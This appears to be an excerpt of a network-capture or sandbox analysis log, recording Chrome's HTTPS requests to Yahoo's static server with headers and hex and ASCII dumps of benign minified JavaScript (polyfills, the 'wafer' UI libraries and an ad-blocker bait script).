                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 36 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 6c 2c 66 2c 70 2c 68 2c 64 3d 74 2e 74 61 72 67 65 74 2c 6d 3d 74 2e 67 6c 6f 62 61 6c 2c 76 3d 74 2e 73 74 61 74 3b 69 66 28 6e 3d 6d 3f 72 3a 76 3f 72 5b 64 5d 7c 7c 61 28 64 2c 7b 7d 29 3a 72 5b 64 5d 26 26 72 5b 64 5d 2e 70 72 6f 74 6f 74 79 70 65 29 66 6f 72 28 6c 20 69 6e 20 65 29 7b 69 66 28 70 3d 65 5b 6c 5d 2c 66 3d 74 2e 64 6f 6e 74 43 61 6c 6c 47 65 74 53 65 74 3f 28 68 3d 6f 28 6e 2c 6c 29 29 26 26 68 2e 76 61 6c 75 65 3a 6e 5b 6c 5d 2c 21 75 28 6d 3f 6c 3a 64 2b 28 76 3f 22 2e 22 3a 22 23 22 29 2b 6c 2c 74 2e 66 6f 72 63 65 64 29 26 26 76 6f 69 64 20 30 21 3d 3d 66 29 7b 69 66 28 74 79 70 65 6f 66 20 70 3d 3d 74 79 70 65 6f 66 20 66 29 63 6f 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 6);t.exports=function(t,e){var n,l,f,p,h,d=t.target,m=t.global,v=t.stat;if(n=m?r:v?r[d]||a(d,{}):r[d]&&r[d].prototype)for(l in e){if(p=e[l],f=t.dontCallGetSet?(h=o(n,l))&&h.value:n[l],!u(m?l:d+(v?".":"#")+l,t.forced)&&void 0!==f){if(typeof p==typeof f)con
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 37 34 37 36 29 2c 6f 3d 6e 28 39 33 30 36 29 2c 69 3d 6e 28 36 31 36 29 2c 73 3d 72 28 72 2e 62 69 6e 64 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 6f 28 74 29 2c 76 6f 69 64 20 30 3d 3d 3d 65 3f 74 3a 69 3f 73 28 74 2c 65 29 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 61 70 70 6c 79 28 65 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 7d 2c 36 31 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 39 30 33 39 29 3b 74 2e 65 78 70 6f 72 74 73 3d 21 72 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2e 62 69 6e 64 28 29 3b 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: se strict";var r=n(7476),o=n(9306),i=n(616),s=r(r.bind);t.exports=function(t,e){return o(t),void 0===e?t:i?s(t,e):function(){return t.apply(e,arguments)}}},616:function(t,e,n){"use strict";var r=n(9039);t.exports=!r((function(){var t=function(){}.bind();r


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              86192.168.2.45110887.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC537OUTGET /aaq/wf/wf-bind-1.1.3-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC743INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: DirL0eaKAqkLDC6YZvo0wII7reEt3t56Kkw7+wrz95aMSoP5KJLcBCNS7J2g6V+n8tTNothHT9c=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 23M0GF9HXF23Q7TN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Sat, 05 Oct 2024 15:31:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 11 Jan 2022 10:14:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "9fba2531ffa6cb0b4d3d34c56c295495"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: Qyt1s0oNtpHMZryrsEe7nbfplEXvu_oO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 3666
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 272534
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 62 69 6e 64 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 62 69 6e 64 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d 2c 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-bind",[],t):"object"==typeof exports?exports["wafer-bind"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a func
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1066INData Raw: 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 2c 69 3d 72 2e 73 65 6c 65 63 74 6f 72 3b 6f 28 74 68 69 73 2c 74 29 3b 66 6f 72 28 76 61 72 20 61 3d 5b 5d 2c 66 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 75 3d 30 3b 75 3c 66 2e 6c 65 6e 67 74 68 3b 75 2b 2b 29 7b 76 61 72 20 73 3d 66 5b 75 5d 2e 6e 61 6d 65 2e 6d 61 74 63 68 28 70 29 3b 73 26 26 73 5b 31 5d 26 26 61 2e 70 75 73 68 28 73 5b 31 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7d 76 61 72 20 6c 3d 6e 28 74 68 69 73 2c 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 29 2e 63 61 6c 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ){var r=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},i=r.selector;o(this,t);for(var a=[],f=e.attributes,u=0;u<f.length;u++){var s=f[u].name.match(p);s&&s[1]&&a.push(s[1].toLowerCase())}var l=n(this,(t.__proto__||Object.getPrototypeOf(t)).call


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              87192.168.2.45110987.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC376OUTGET /nn/lib/metro/g/myy/advertisement_0.0.19.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC699INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: HLUTnOg1yrcD82+qs67Vkdo5lqPIIiiMsEF9MXYdmpsNJCBCzyhAQHp2basnpLtnlwg6l9lHr4w=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 8HFZP7VZFGYQHN93
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Sun, 29 Sep 2024 13:37:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 19 May 2020 03:33:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "ca243b22264dca7a4a899c51cc2dc963"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=31536000, public, immutable
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 158
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC158INData Raw: 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 64 69 76 20 69 64 3d 22 61 64 76 65 72 74 69 73 65 6d 65 6e 74 2d 74 68 61 6d 62 61 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 44 69 73 70 6c 61 79 20 41 64 76 65 72 74 69 73 65 6d 65 6e 74 3c 2f 64 69 76 3e 27 29 3b 2f 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 32 30 2c 20 59 61 68 6f 6f 21 20 49 6e 63 2e 20 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2a 2f 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: document.write('<div id="advertisement-thamba" style="display:none">Display Advertisement</div>');/* Copyright (c) 2020, Yahoo! Inc. All rights reserved. */


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              88192.168.2.45111087.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC538OUTGET /aaq/wf/wf-image-1.4.0-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC742INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: KS/POddf0qWB2XyHyglC5BQ0/I3dofOx06bp/SuF+cAUkqy/GDSaSZwFKGS9tKlfLFZb16aQ/m8=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 0QM0JQNVXFMK6MAS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Mon, 07 Oct 2024 16:51:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 15 Apr 2022 16:44:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "2e3968239b770b8186bb480d513311cd"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: kGIIRCHIdgWfcr_wSmm8v8C_z6K3HVA8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 6645
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 94960
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 69 6d 61 67 65 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 69 6d 61 67 65 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-image",[],t):"object"==typeof exports?exports["wafer-image"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c 74 2c 72 29 7b 72 26 26 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 73 65 74 22 2c 72 29 2c 65 2e 73 72 63 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 2c 72 29 7b 76 61 72 20 61 3d 65 2e 67 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: totype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function n(e,t,r){r&&e.setAttribute("srcset",r),e.src=t}function i(e,t,r){var a=e.ge
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 72 3d 65 2e 72 6f 6f 74 2c 73 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f 64 6f 63 75 6d 65 6e 74 3a 72 3b 61 28 74 68 69 73 2c 74 29 3b 76 61 72 20 6e 3d 74 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 66 69 67 73 2c 69 3d 6e 2e 64 61 72 6b 53 72 63 73 65 74 2c 6c 3d 6e 2e 6e 61 74 69 76 65 43 6c 61 73 73 2c 75 3d 6e 2e 73 65 6c 65 63 74 6f 72 2c 66 3d 6e 2e 73 65 70 61 72 61 74 6f 72 2c 64 3d 6e 2e 73 72 63 73 65 74 2c 70 3d 6e 2e 73 75 63 63 65 73 73 43 6c 61 73 73 2c 79 3d 6f 28 74 68 69 73 2c 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 29 2e 63 61 6c 6c 28 74 68 69 73 2c 7b 72 6f 6f 74 3a 73 2c 73 65 6c 65 63 74 6f 72 3a 75 2c 73 75 63 63 65 73 73 43 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: uments[0]:{},r=e.root,s=void 0===r?document:r;a(this,t);var n=t.prototype.configs,i=n.darkSrcset,l=n.nativeClass,u=n.selector,f=n.separator,d=n.srcset,p=n.successClass,y=o(this,(t.__proto__||Object.getPrototypeOf(t)).call(this,{root:s,selector:u,successCl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 22 2c 64 29 7d 29 29 2c 74 2e 5f 61 64 64 45 76 65 6e 74 73 54 6f 45 6c 65 6d 65 6e 74 28 65 2c 70 2c 22 64 65 66 61 75 6c 74 22 2c 6f 29 7d 72 65 74 75 72 6e 20 61 28 29 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 43 6f 6c 6f 72 53 63 68 65 6d 61 43 68 61 6e 67 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e 64 61 72 6b 6d 6f 64 65 49 6e 73 74 61 6e 63 65 73 2c 74 3d 21 30 2c 72 3d 21 31 2c 61 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 6f 2c 73 3d 65 2e 6b 65 79 73 28 29 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 3b 21 28 74 3d 28 6f 3d 73 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 3b 74 3d 21 30 29 7b 76 61 72 20 6e 3d 6f 2e 76 61 6c 75 65 3b 74 68 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ",d)})),t._addEventsToElement(e,p,"default",o)}return a()})}},{key:"handleColorSchemaChange",value:function(){var e=this._state.darkmodeInstances,t=!0,r=!1,a=void 0;try{for(var o,s=e.keys()[Symbol.iterator]();!(t=(o=s.next()).done);t=!0){var n=o.value;thi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 7b 65 6c 65 6d 3a 65 2c 6d 65 74 61 3a 7b 73 72 63 3a 73 2c 73 72 63 73 65 74 3a 69 7d 2c 6e 61 6d 65 3a 22 57 61 66 65 72 49 6d 61 67 65 22 2c 73 74 61 63 6b 3a 6e 75 6c 6c 7d 29 2c 77 28 74 2c 22 65 72 72 6f 72 22 2c 72 29 2c 77 28 74 2c 22 6c 6f 61 64 22 2c 76 29 7d 2c 76 3d 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 22 6e 61 74 69 76 65 22 21 3d 3d 72 3f 28 22 69 6d 61 67 65 22 3d 3d 3d 6c 7c 7c 22 70 69 63 74 75 72 65 22 3d 3d 3d 6c 3f 6e 28 65 2c 73 2c 69 29 3a 65 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 3d 27 75 72 6c 28 22 27 2b 73 2b 27 22 29 27 2c 6f 2e 5f 69 74 65 6d 4c 6f 61 64 65 64 28 65 29 29 3a 28 6f 2e 5f 61 64 64 42 6f 75 6e 64 61 72 79 53 75 63 63 65 73 73 43 6c 61 73 73 28 65 29 2c 65 2e 63 6c 61 73 73 4c 69 73 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {elem:e,meta:{src:s,srcset:i},name:"WaferImage",stack:null}),w(t,"error",r),w(t,"load",v)},v=function a(){"native"!==r?("image"===l||"picture"===l?n(e,s,i):e.style.backgroundImage='url("'+s+'")',o._itemLoaded(e)):(o._addBoundarySuccessClass(e),e.classList
